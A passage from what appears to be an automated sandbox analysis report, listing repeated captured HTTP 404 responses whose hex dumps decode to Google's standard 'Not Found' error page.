69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 